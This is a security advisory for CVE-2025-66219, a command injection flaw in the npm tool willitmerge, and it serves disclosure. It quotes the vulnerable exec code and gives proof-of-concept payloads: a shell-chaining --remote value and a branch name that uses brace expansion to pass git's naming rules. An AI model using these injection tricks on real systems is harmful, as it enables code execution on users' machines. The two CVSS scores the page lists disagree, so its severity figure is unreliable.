
CVE

CVE-2025-66219

willitmerge has a Command Injection vulnerability

willitmerge describes itself as a command line tool to check if pull requests are mergeable. There is a Command Injection vulnerability in version willitmerge@0.2.1.

Resources: 

  • Project's GitHub source code: https://github.com/shama/willitmerge/
  • Project's npm package: https://www.npmjs.com/package/willitmerge

Background on exploitation

The vulnerability in the willitmerge npm package is a command injection. The package builds its git command lines as strings, concatenating user-controlled values into them, and runs the result through the child_process exec API, which hands the string to a shell. The values reach the command string either from the --remote command-line flag or from data that collaborators on the target repository control, such as pull request branch names.

Exploit

POC 1

  1. Install willitmerge
  2. Run it with the following command:

     willitmerge --verbose --remote "https://github.com/lirantal/npq.git; touch /tmp/hel"

  3. Confirm that the file /tmp/hel has been created on disk

The --remote value is concatenated, unquoted, into the git checkout command string, so the shell that exec spawns treats everything after the ; as a second command.

GitHub-sourced attack vector

Lines 189-197 in lib/willitmerge.js (commit 2fe91d05191fb05ac6da685828d109a3a5885028) build the git commands as shell strings, concatenating values that repository collaborators control: the pull request's base and head branch names (iss.base.ref, iss.head.ref) and the head repository URL (gitUrl), together with the --remote option (that.options.remote). The strings are then run through exec, which passes them to a shell:

  var cmds = [
    'git checkout -b ' + branch + ' ' + that.options.remote + '/' + iss.base.ref,
    'git remote add ' + branch + ' ' + gitUrl,
    'git pull ' + branch + ' ' + iss.head.ref,
    'git reset --merge HEAD',
    'git checkout ' + origBranch,
    'git branch -D ' + branch,
    'git remote rm ' + branch
  ];

A collaborator who opens a pull request from a branch named, for example, ;{echo,hello,world}>/tmp/c gets that command executed on the machine of whoever runs willitmerge against the repository. The brace expansion is there because git ref names cannot contain spaces: the shell expands {echo,hello,world} to echo hello world, so the payload passes git's ref-name rules without any whitespace. Note that Node's exec runs the string with /bin/sh, so this particular payload fires where /bin/sh supports brace expansion (bash) and not where /bin/sh is dash; the injection itself does not depend on the shell.

This is the same attack vector that was reported for the pullit vulnerability (https://security.snyk.io/vuln/npm:pullit:20180214).

Author

Liran Tal


CVSS

  • CVSS 4.0 base score: 6.9 (Medium)
  • Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X


References

  • https://github.com/shama/willitmerge/security/advisories/GHSA-j9wj-m24m-7jj6
  • https://nvd.nist.gov/vuln/detail/CVE-2025-66219
  • https://github.com/shama/willitmerge
  • https://github.com/shama/willitmerge/blob/2fe91d05191fb05ac6da685828d109a3a5885028/lib/willitmerge.js#L189-L197

Basic Information

  • Ecosystem: npm
  • Base CVSS: 9.8 (as listed on this page; the CVSS 4.0 vector shown in the CVSS section scores 6.9)
  • EPSS probability: 0.00242%
  • EPSS percentile: 0.47192%
  • Introduced version: 0
